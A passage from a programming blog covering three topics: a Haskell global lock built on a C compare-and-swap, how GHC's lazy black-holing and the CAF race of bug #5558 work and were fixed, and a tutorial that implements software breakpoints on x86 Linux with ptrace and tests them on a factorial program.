It's fine for two threads to enter set concurrently. In one thread, the assignment will be dropped, and c_set_global will return 0. In that case we free the unused StablePtr, and the MVar will eventually be garbage-collected. StablePtrs must be freed manually, because the GHC garbage collector can't tell if some C code has stashed away the corresponding void*.

Now we can retrieve the MVar, or create it if necessary.

get :: IO (MVar ())
get = do
p <- c_get_global
if p == nullPtr
then set >> get
else deRefStablePtr (castPtrToStablePtr p)

In the common path, we do an unsynchronized read on the global variable. Only if the variable appears to contain NULL do we allocate an MVar, perform a synchronized compare-and-swap, etc. This keeps overhead low, and makes this library suitable for fine-grained locking.

All that's left is the user-visible locking interface:

lock :: IO a -> IO a
lock act = get >>= flip withMVar (const act)

Inspecting the machine code

Just for fun, let's see how GCC implements __sync_val_compare_and_swap on the AMD64 architecture.

$ objdump -d dist/build/cbits/global.o
...
0000000000000010 <hs_globalzmlock_set_global>:
  10:   31 c0                   xor    %eax,%eax
  12:   f0 48 0f b1 3d 00 00    lock cmpxchg %rdi,0x0(%rip)
  19:   00 00
....

This lock cmpxchg is the same instruction used by the GHC runtime system for its own atomic compare-and-swap. The offset on the operand 0x0(%rip) will be relocated to point at global.

Monday, October 31, 2011

Thunks and lazy blackholes: an introduction to GHC at runtime

This article is about a GHC bug I encountered recently, but it's really an excuse to talk about some GHC internals at an intro level. (In turn, an excuse for me to learn about those internals.)

I'll assume you're familiar with the basics of Haskell and lazy evaluation.

The bug

I spoke before of using global locks in Haskell to protect a thread-unsafe C library. Unfortunately a GHC bug prevents this from working. Using unsafePerformIO at the top level of a file can result in IO that happens more than once.

Here is a simple program which illustrates the problem:

import Control.Concurrent
import Control.Monad
import System.IO.Unsafe

ioThunk :: ()
ioThunk = unsafePerformIO $ do
me <- myThreadId
putStrLn ("IO executed by " ++ show me)
{-# NOINLINE ioThunk #-}

main :: IO ()
main = do
replicateM_ 100 (forkIO (print ioThunk))
threadDelay 10000 -- wait for other threads

Let's test this, following the compiler flag recommendations for unsafePerformIO.

$ ghc -V
The Glorious Glasgow Haskell Compilation System, version 7.2.1

$ ghc -rtsopts -threaded -fno-cse -fno-full-laziness dupe.hs
[1 of 1] Compiling Main             ( dupe.hs, dupe.o )
Linking dupe ...

$ while true; do ./dupe +RTS -N | head -n 2; echo ----; done

Within a few seconds I see output like this:

----
IO executed by ThreadId 35
()
----
IO executed by ThreadId 78
IO executed by ThreadId 85
----
IO executed by ThreadId 48
()
----

In the middle run, two threads executed the IO action.

This bug was reported two weeks ago and is already fixed in GHC HEAD. I tested with GHC 7.3.20111026, aka g6f5b798, and the problem seemed to go away.

Unfortunately it will be some time before GHC 7.4 is widely deployed, so I'm thinking about workarounds for my original global locking problem. I'll probably store the lock in a C global variable via StablePtr, or failing that, implement all locking in C. But I'd appreciate any other suggestions.

The remainder of this article is an attempt to explain this GHC bug, and the fix committed by Simon Marlow. It's long because

  • I try not to assume you know anything about how GHC works. I don't know very much, myself.

  • There are various digressions.

Objects at runtime

Code produced by GHC can allocate many kinds of objects. Here are just a few:

  • CONSTR objects represent algebraic data constructors and their associated fields. The value (Just 'x') would be represented by a CONSTR object, holding a pointer to another object representing 'x'.

  • FUN objects represent functions, like the value (\x -> x+1).

  • THUNK objects represent computations which have not yet happened. Suppose we write:

    let x = 2 + 2 in f x x

    This code will construct a THUNK object for x and pass it to the code for f. Some time later, f may force evaluation of its argument, and the thunk will, in turn, invoke (+). When the thunk has finished evaluating, it is overwritten with the evaluation result. (Here, this might be an I# CONSTR holding the number 4.) If f then forces its second argument, which is also x, the work done by (+) is not repeated. This is the essence of lazy evaluation.

  • When a thunk is forced, it's first overwritten with a BLACKHOLE object. This BLACKHOLE is eventually replaced with the evaluation result. Therefore a BLACKHOLE represents a thunk which is currently being evaluated.

    Identifying this case helps the garbage collector, and it also gives GHC its seemingly magical ability to detect some infinite loops. Forcing a BLACKHOLE indicates a computation which cannot proceed until the same computation has finished. The GHC runtime will terminate the program with a <<loop>> exception.

  • We can't truly update thunks in place, because the evaluation result might be larger than the space originally allocated for the thunk. So we write an indirection pointing to the evaluation result. These IND objects will later be removed by the garbage collector.

Static objects

Dynamically-allocated objects make sense for values which are created as your program runs. But the top-level declarations in a Haskell module don't need to be dynamically allocated; they already exist when your program starts up. GHC allocates these static objects in your executable's data section, the same place where C global variables live.

Consider this program:

x = Just 'x'

f (Just _) = \y -> y+1

main = print (f x 3)

Ignoring optimizations, GHC will produce code where:

  • x is a CONSTR_STATIC object.

  • f is a FUN_STATIC object. When called, f will return a dynamically-allocated FUN object representing (\y -> y+1).

  • main is a THUNK_STATIC object. It represents the unevaluated expression formed by applying the function print to the argument (f x 3). A static thunk is also known as a constant applicative form, or a CAF for short. Like any other thunk, a CAF may or may not get evaluated. If evaluated, it will be replaced with a black hole and eventually the evaluation result. In this example, main will be evaluated by the runtime system, in deciding what IO to perform.

Black holes and revelations

That's all fine for a single-threaded Haskell runtime, but GHC supports running many Haskell threads across multiple OS threads. This introduces some additional complications. For example, one thread might force a thunk which is currently being evaluated by another thread. The thread will find a BLACKHOLE, but terminating the program would be incorrect. Instead the BLACKHOLE puts the current Haskell thread to sleep, and wakes it up when the evaluation result is ready.

If two threads force the same thunk at the same time, they will both perform the deferred computation. We could avoid this wasted effort by writing and checking for black holes using expensive atomic memory operations. But this is a poor tradeoff; we slow down every evaluation in order to prevent a rare race condition.

As a compiler for a language with pure evaluation, GHC has the luxury of tolerating some duplicated computation. Evaluating an expression twice can't change a program's behavior. And most thunks are cheap to evaluate, hardly worth the effort of avoiding duplication. So GHC follows a "lazy black-holing" strategy.12 Threads write black holes only when they enter the garbage collector. If a thread discovers that one of its thunks has already been claimed, it will abandon the duplicated work-in-progress. This scheme avoids large wasted computations without paying the price on small computations. You can find the gritty details within the function threadPaused, in rts/ThreadPaused.c.

unsafe[Dupable]PerformIO

You may remember that we started, all those many words ago, with a program that uses unsafePerformIO. This breaks the pure-evaluation property of Haskell. Repeated evaluation will affect semantics! Might lazy black-holing be the culprit in the original bug?

Naturally, the GHC developers thought about this case. Here's the implementation of unsafePerformIO:

unsafePerformIO m = unsafeDupablePerformIO (noDuplicate >> m)

noDuplicate = IO $ \s -> case noDuplicate# s of s' -> (# s', () #)

unsafeDupablePerformIO (IO m) = lazy (case m realWorld# of (# _, r #) -> r)

The core behavior is implemented by unsafeDupablePerformIO, using GHC's internal representation of IO actions (which is beyond the scope of this article, to the extent I even have a scope in mind). As the name suggests, unsafeDupablePerformIO provides no guarantee against duplicate execution. The more familiar unsafePerformIO builds this guarantee by first invoking the noDuplicate# primitive operation.

The implementation of noDuplicate#, written in GHC's Cmm intermediate language, handles a few tricky considerations. But it's basically a call to the function threadPaused, which we saw is responsible for lazy black-holing. In other words, thunks built from unsafePerformIO perform eager black-holing.

Since threadPaused has to walk the evaluation stack, unsafeDupablePerformIO might be much faster than unsafePerformIO. In practice, this will matter when performing a great number of very quick IO actions, like peeking a single byte from memory. In this case it is safe to duplicate IO, provided the buffer is unchanging. Let's measure the performance difference.

import GHC.IO
import Foreign hiding (unsafePerformIO)
import System.Random
import Criterion.Main

main = do
let sz = 1024*1024
buf <- mallocBytes sz
let get i = peekByteOff buf i :: IO Word8
peek_d i = unsafeDupablePerformIO (get i)
peek_n i = unsafePerformIO (get i)
idxes = take 1024 $ randomRs (0, sz-1) (mkStdGen 49)
evaluate (sum idxes) -- force idxes ahead of time
defaultMain
[ bench "dup" $ nf (map peek_d) idxes
, bench "noDup" $ nf (map peek_n) idxes ]

And the results:

$ ghc -rtsopts -threaded -O2 peek.hs && ./peek +RTS -N
...

benchmarking dup
mean: 76.42962 us, lb 75.11134 us, ub 78.18593 us, ci 0.950
std dev: 7.764123 us, lb 6.300310 us, ub 9.790345 us, ci 0.950

benchmarking noDup
mean: 142.1720 us, lb 139.7312 us, ub 145.4300 us, ci 0.950
std dev: 14.43673 us, lb 11.40254 us, ub 17.86663 us, ci 0.950

So performance-critical idempotent actions can benefit from unsafeDupablePerformIO. But most code should use the safer unsafePerformIO, as our bug reproducer does. And the noDuplicate# machinery for unsafePerformIO makes sense, so what's causing our bug?

The bug, finally

After all those details and diversions, let's go back to the fix for GHC bug #5558. The action is mostly in rts/sm/Storage.c. This file is part of GHC's storage manager, which provides services such as garbage collection.

Recall that our problematic code looked like this:

ioThunk :: ()
ioThunk = unsafePerformIO $ do ...

This is an application of the function ($) to the argument unsafePerformIO. So it's a static thunk, a CAF. Here's the old description of how CAF evaluation works, from Storage.c:

The entry code for every CAF does the following:

  • builds a BLACKHOLE in the heap
  • pushes an update frame pointing to the BLACKHOLE
  • calls newCaf, below
  • updates the CAF with a static indirection to the BLACKHOLE

Why do we build an BLACKHOLE in the heap rather than just updating the thunk directly? It's so that we only need one kind of update frame - otherwise we'd need a static version of the update frame too.

So here's the problem. Normal thunks get blackholed in place, and a thread detects duplicated evaluation by noticing that one of its thunks-in-progress became a BLACKHOLE. But static thunks — CAFs — are blackholed by indirection. Two threads might perform the above procedure concurrently, producing two different heap-allocated BLACKHOLEs, and they'd never notice.

As Simon Marlow put it:

Note [atomic CAF entry]

With THREADED_RTS, newCaf() is required to be atomic (see #5558). This is because if two threads happened to enter the same CAF simultaneously, they would create two distinct CAF_BLACKHOLEs, and so the normal threadPaused() machinery for detecting duplicate evaluation will not detect this. Hence in lockCAF() below, we atomically lock the CAF with WHITEHOLE before updating it with IND_STATIC, and return zero if another thread locked the CAF first. In the event that we lost the race, CAF entry code will re-enter the CAF and block on the other thread's CAF_BLACKHOLE.

I can't explain precisely what a WHITEHOLE means, but they're used for spin locks or wait-free synchronization in various places. For example, the MVar primitives are synchronized by the lockClosure spinlock routine, which uses WHITEHOLEs.

The fix

Here's the corrected CAF evaluation procedure:

The entry code for every CAF does the following:

  • builds a CAF_BLACKHOLE in the heap
  • calls newCaf, which atomically updates the CAF with IND_STATIC pointing to the CAF_BLACKHOLE
  • if newCaf returns zero, it re-enters the CAF (see Note [atomic CAF entry])
  • pushes an update frame pointing to the CAF_BLACKHOLE

newCAF is made atomic by introducing a new helper function, lockCAF, which is reproduced here for your viewing pleasure:

STATIC_INLINE StgWord lockCAF (StgClosure *caf, StgClosure *bh)
{
const StgInfoTable *orig_info;

orig_info = caf->header.info;

#ifdef THREADED_RTS
const StgInfoTable *cur_info;

if (orig_info == &stg_IND_STATIC_info ||
orig_info == &stg_WHITEHOLE_info) {
// already claimed by another thread; re-enter the CAF
return 0;
}

cur_info = (const StgInfoTable *)
cas((StgVolatilePtr)&caf->header.info,
(StgWord)orig_info,
(StgWord)&stg_WHITEHOLE_info);

if (cur_info != orig_info) {
// already claimed by another thread; re-enter the CAF
return 0;
}

// successfully claimed by us; overwrite with IND_STATIC
#endif

// For the benefit of revertCAFs(), save the original info pointer
((StgIndStatic *)caf)->saved_info = orig_info;

((StgIndStatic*)caf)->indirectee = bh;
write_barrier();
SET_INFO(caf,&stg_IND_STATIC_info);

return 1;
}

We grab the CAF's info table pointer, which tells us what kind of object it is. If it's not already claimed by another thread, we write a WHITEHOLE — but only if the CAF hasn't changed in the meantime. This step is an atomic compare-and-swap, implemented by architecture-specific code. The function cas is specified by this pseudocode:

cas(p,o,n) {
atomically {
r = *p;
if (r == o) { *p = n };
return r;
}
}

Here's the implementation for x86, using GCC extended inline assembly:

EXTERN_INLINE StgWord
cas(StgVolatilePtr p, StgWord o, StgWord n)
{
__asm__ __volatile__ (
"lock\ncmpxchg %3,%1"
:"=a"(o), "=m" (*(volatile unsigned int *)p)
:"0" (o), "r" (n));
return o;
}

There are some interesting variations between architectures. SPARC and x86 use single instructions, while PowerPC and ARMv6 have longer sequences. Old ARM processors require a global spinlock, which sounds painful. Who's running Haskell on ARMv5 chips?

*deep breath*

Thanks for reading / skimming this far! I learned a lot by writing this article, and I hope you enjoyed reading it. I'm sure I said something wrong somewhere, so please do not hesitate to correct me in the comments.


  1. Tim Harris, Simon Marlow, and Simon Peyton Jones. Haskell on a shared-memory multiprocessor. In Haskell '05: Proceedings of the 2005 ACM SIGPLAN workshop on Haskell, pages 49–61.

  2. Simon Marlow, Simon Peyton Jones, and Satnam Singh. Runtime Support for Multicore Haskell. In ICFP'09.

Sunday, January 9, 2011

Implementing breakpoints on x86 Linux

Debugger features such as breakpoints go well beyond the normal ways in which programs interact. How can one process force another process to pause at a particular line of code? We can bet that the debugger is using some special features of the CPU and/or operating system.

As I learned about implementing breakpoints, I was surprised to find that these interfaces, while arcane, are not actually very complex. In this article we'll implement a minimal but working breakpoints library in about 75 lines of C code. All of the code is shown here, and is also available on GitHub.

True, most of us will never write a debugger. But breakpoints are useful in many other tools: profilers, compatibility layers, security scanners, etc. If your program has to interact deeply with another process, without modifying its source code, breakpoints might just do the trick. And I think there's value in knowing what your debugger is really doing.

Our code will compile with gcc and will run on Linux machines with 32- or 64-bit x86 processors. I'll assume you're familiar with the basics of UNIX programming in C. We'll make heavy use of the ptrace system call, which I'll try to explain as we go. If you're looking for other reading about ptrace, I highly recommend this article and of course the manpage.

The API

Our little breakpoint library is named breakfast. Here's breakfast.h:

#ifndef _BREAKFAST_H
#define _BREAKFAST_H

#include <sys/types.h> /* for pid_t */

typedef void *target_addr_t;
struct breakpoint;

void breakfast_attach(pid_t pid);
target_addr_t breakfast_getip(pid_t pid);
struct breakpoint *breakfast_break(pid_t pid, target_addr_t addr);
int breakfast_run(pid_t pid, struct breakpoint *bp);

#endif

Before we dive into the implementation, we'll describe the API our library provides. breakfast is used by one process (the tracing process) to place breakpoints inside the code of another process (the target process). To establish this relationship, the tracing process calls breakfast_attach with the target's process ID. This also suspends execution of the target.

We use breakfast_getip to read the target's instruction pointer, which holds the address of the next instruction it will execute. Note that this is a pointer to machine code within the target's address space. Dereferencing the pointer within our tracing process would make little sense. The type alias target_addr_t reminds us of this fact.

We use breakfast_break to create a breakpoint at a specified address in the target's machine code. This function returns a pointer to a breakpoint structure, which has unspecified contents.

Calling breakfast_run lets the target run until it hits a breakpoint or it exits; breakfast_run returns 1 or 0 respectively. On the first invocation, we'll pass NULL for the argument bp. On subsequent calls, we're resuming from a breakpoint, and we must pass the corresponding breakpoint struct pointer. The breakfast_getip function will tell us the breakpoint's address, but it's our responsibility to map this to the correct breakpoint structure.

The trap instruction

We will implement a breakpoint by inserting a new CPU instruction into the target's memory at the breakpoint address. This instruction should suspend execution of the target and give control back to the OS.

There are many ways to return control to the OS, but we'd like to minimize disruption to the code we're hot-patching. x86 provides an instruction for exactly this purpose. It's named int3 and is encoded as the single byte 0xCC. When the CPU executes int3, it will stop what it's doing and jump to the interrupt 3 service routine, which is a piece of code chosen by the OS. On Linux, this routine will send the signal SIGTRAP to the current process.

Since we're placing int3 in the target's code, the target will receive a SIGTRAP. Under normal circumstances this would invoke the target's SIGTRAP handler, which usually kills the process. Instead we'd like the tracing process to intercept this signal and interpret it as the target hitting a breakpoint. We'll accomplish this through the magic of ptrace.

Let's start off breakfast.c with some includes:

#include <sys/ptrace.h>
#include <sys/reg.h>
#include <sys/wait.h>
#include <stdlib.h>
#include "breakfast.h"

Then we'll define our trap instruction:

#if defined(__i386)
#define REGISTER_IP EIP
#define TRAP_LEN 1
#define TRAP_INST 0xCC
#define TRAP_MASK 0xFFFFFF00

#elif defined(__x86_64)
#define REGISTER_IP RIP
#define TRAP_LEN 1
#define TRAP_INST 0xCC
#define TRAP_MASK 0xFFFFFFFFFFFFFF00

#else
#error Unsupported architecture
#endif

We use some GCC pre-defined macros to discover the machine architecture, and we define a few constants accordingly. REGISTER_IP expands to a constant from sys/reg.h which identifies the machine register holding the instruction pointer.

The trap instruction is stored as an integer TRAP_INST and its length in bytes is TRAP_LEN. These are the same on 32- and 64-bit x86. The trap instruction is a single byte, but we'll read and write the target's memory in increments of one machine word, meaning 32 or 64 bits. So we'll read 4 or 8 bytes of machine code, clear out the first byte with TRAP_MASK, and substitute 0xCC. Since x86 is a little-endian architecture, the first byte in memory is the least-significant byte of an integer machine word.

Invoking ptrace

All of the various ptrace requests are made through a single system call named ptrace. The first argument specifies the type of request and the meaning of any remaining arguments. The second argument is almost always the process ID of the target.

Before we can mess with the target process, we need to attach to it:

void breakfast_attach(pid_t pid) {
int status;
ptrace(PTRACE_ATTACH, pid);
waitpid(pid, &status, 0);
ptrace(PTRACE_SETOPTIONS, pid, 0, PTRACE_O_TRACEEXIT);
}

The PTRACE_ATTACH request will stop the target with SIGSTOP. We wait for the target to receive this signal. We also request to receive a notification when the target exits, which I'll explain below.

Note that ptrace and waitpid could fail in various ways. In a real application you'd want to check the return value and/or errno. For brevity I've omitted those checks in this article.

We use another ptrace request to get the value of the target's instruction pointer:

target_addr_t breakfast_getip(pid_t pid) {
long v = ptrace(PTRACE_PEEKUSER, pid, sizeof(long)*REGISTER_IP);
return (target_addr_t) (v - TRAP_LEN);
}

Since the target process is suspended, it's not running on any CPU, and its instruction pointer is not stored in a real CPU register. Instead, it's saved to a "user area" in kernel memory. We use the PTRACE_PEEKUSER request to read a machine word from this area at a specified byte offset. The constants in sys/regs.h give the order in which registers appear, so we simply multiply by sizeof(long).

After we hit a breakpoint, the saved IP points to the instruction after the trap instruction. When we resume execution, we'll go back and execute the original instruction that we overwrote with the trap. So we subtract TRAP_LEN to give the true address of the next instruction.

Creating breakpoints

We need to remember two things about a breakpoint: the address of the code we replaced, and the code which originally lived there.

struct breakpoint {
target_addr_t addr;
long orig_code;
};

To enable a breakpoint, we save the original code and insert our trap instruction:

static void enable(pid_t pid, struct breakpoint *bp) {
long orig = ptrace(PTRACE_PEEKTEXT, pid, bp->addr);
ptrace(PTRACE_POKETEXT, pid, bp->addr, (orig & TRAP_MASK) | TRAP_INST);
bp->orig_code = orig;
}

The PTRACE_PEEKTEXT request reads a machine word from the target's code address space, which is named "text" for historical reasons. PTRACE_POKETEXT writes to that space. On x86 Linux there's actually no difference between code and data spaces, so PTRACE_PEEKDATA and PTRACE_POKEDATA would work just as well.

Creating a breakpoint is straightforward:

struct breakpoint *breakfast_break(pid_t pid, target_addr_t addr) {
struct breakpoint *bp = malloc(sizeof(*bp));
bp->addr = addr;
enable(pid, bp);
return bp;
}

To disable a breakpoint we just write back the saved word:

static void disable(pid_t pid, struct breakpoint *bp) {
ptrace(PTRACE_POKETEXT, pid, bp->addr, bp->orig_code);
}

Running and stepping

Once we attach to the target, its execution stops. Here's how to resume it:

static int run(pid_t pid, int cmd);  /* defined momentarily */

int breakfast_run(pid_t pid, struct breakpoint *bp) {
if (bp) {
ptrace(PTRACE_POKEUSER, pid, sizeof(long)*REGISTER_IP, bp->addr);

disable(pid, bp);
if (!run(pid, PTRACE_SINGLESTEP))
return 0;
enable(pid, bp);
}
return run(pid, PTRACE_CONT);
}

We ask ptrace to continue execution — but if we're resuming from a breakpoint, we have to do some cleanup first. We rewind the instruction pointer so that the next instruction to execute is at the breakpoint. Then we disable the breakpoint and make the target execute just one instruction. Once we're past the breakpoint, we can re-enable it for next time. run returns 0 if the target exits, which theoretically could happen during our single-step.

The last piece of the puzzle is run:

static int run(pid_t pid, int cmd) {
int status, last_sig = 0, event;
while (1) {
ptrace(cmd, pid, 0, last_sig);
waitpid(pid, &status, 0);

if (WIFEXITED(status))
return 0;

if (WIFSTOPPED(status)) {
last_sig = WSTOPSIG(status);
if (last_sig == SIGTRAP) {
event = (status >> 16) & 0xffff;
return (event == PTRACE_EVENT_EXIT) ? 0 : 1;
}
}
}
}

cmd is either PTRACE_CONT or PTRACE_SINGLESTEP. In the latter case, the OS will set a control bit to make the CPU raise interrupt 3 after one instruction has completed.

ptrace will let the target run until it exits or receives a signal. We use the wait macros to see what happened. If the target exited, we simply return 0. If it received a signal, we check which one. Anything other than SIGTRAP should be delivered through to the target, which we accomplish by passing the signal number to the next ptrace call.

In the case of SIGTRAP, we check bits 16-31 of status for the value PTRACE_EVENT_EXIT, which indicates that the target is about to exit. Recall that we requested this notification by setting the option PTRACE_O_TRACEEXIT. You'd think (at least, I did) that checking WIFEXITED should be enough. But I ran into a problem where delivering a fatal signal to the target would make the tracing process loop forever. I fixed it by adding this extra check. I'm certainly no ptrace expert and I'd be interested to hear more about what's going on here.

Testing it

That's all for breakfast.c! Now let's write a small test.c.

#include <sys/types.h>
#include <signal.h>
#include <unistd.h>
#include <stdio.h>
#include "breakfast.h"

void child();
void parent(pid_t);

int main() {
pid_t pid;
if ((pid = fork()) == 0)
child();
else
parent(pid);
return 0;
}

We fork two separate processes, a parent and a child. The child will do some computation we hope to observe. Let's make it compute the famous factorial function:

int fact(int n) {
if (n <= 1)
return 1;
return n * fact(n-1);
}

void child() {
kill(getpid(), SIGSTOP);
printf("fact(5) = %d\n", fact(5));
}

The parent is going to invoke PTRACE_ATTACH and send the child SIGSTOP, but the child might finish executing before the parent gets a chance to call ptrace. So we make the child preemptively stop itself. This isn't a problem when attaching to a long-running process.

Actually, for this fork-and-trace-child pattern, we should be using PTRACE_TRACEME. But we implemented a minimal library, so we work with what we have.

The parent uses breakfast to place breakpoints in the child:

void parent(pid_t pid) {
struct breakpoint *fact_break, *last_break = NULL;
void *fact_ip = fact, *last_ip;
breakfast_attach(pid);
fact_break = breakfast_break(pid, fact_ip);
while (breakfast_run(pid, last_break)) {
last_ip = breakfast_getip(pid);
if (last_ip == fact_ip) {
printf("Break at fact()\n");
last_break = fact_break;
} else {
printf("Unknown trap at %p\n", last_ip);
last_break = NULL;
}
}
}

In principle we can use breakfast to trace any running process we own, even if we don't have its source code. But we still need a way to find interesting breakpoint addresses. Here it's as easy as we could want: the child forked from our process, so we get the address of its fact function just by taking the address of our fact function.

Let's try it out:

$ gcc -Wall -o test test.c breakfast.c
$ ./test
Break at fact()
Break at fact()
Break at fact()
Break at fact()
Break at fact()
fact(5) = 120

We can see the five calls to fact.

Inspecting the target

The ability to count function calls is already useful for performance profiling. But we'll usually want to get more information out of the stopped target. Let's see if we can read the arguments passed to fact. This part will be specific to 64-bit x86, though the idea generalizes.

Each architecture defines a C calling convention, which specifies how function arguments are passed, often using a combination of registers and stack slots. On 64-bit x86, the first argument is passed in the RDI register. You can verify this by running objdump -d test and looking at the disassembled code for fact.

So we'll modify test.c to read this register:

#include <sys/ptrace.h>
#include <sys/reg.h>
...
if (last_ip == fact_ip) {
int arg = ptrace(PTRACE_PEEKUSER, pid, sizeof(long)*RDI);
printf("Break at fact(%d)\n", arg);
...

And we get:

$ gcc -Wall -o test test.c breakfast.c
$ ./test
Break at fact(5)
Break at fact(4)
Break at fact(3)
Break at fact(2)
Break at fact(1)
fact(5) = 120

Cool!

Notes

This is my first non-trivial project using ptrace, and it's likely I got some details wrong. Please reply with corrections or advice and I'll update the code if necessary.

This code is available for download at GitHub. It's released under a BSD license, which imposes few restrictions. It's definitely not suitable as-is for production use, but feel free to take the code and build something more with it.

The x86 architecture has dedicated registers for setting breakpoints, subject to various limitations. We ignored this feature in favor of the more flexible software breakpoints. Hardware breakpoints can do some things this technique can't, such as breaking on reads from a particular memory address.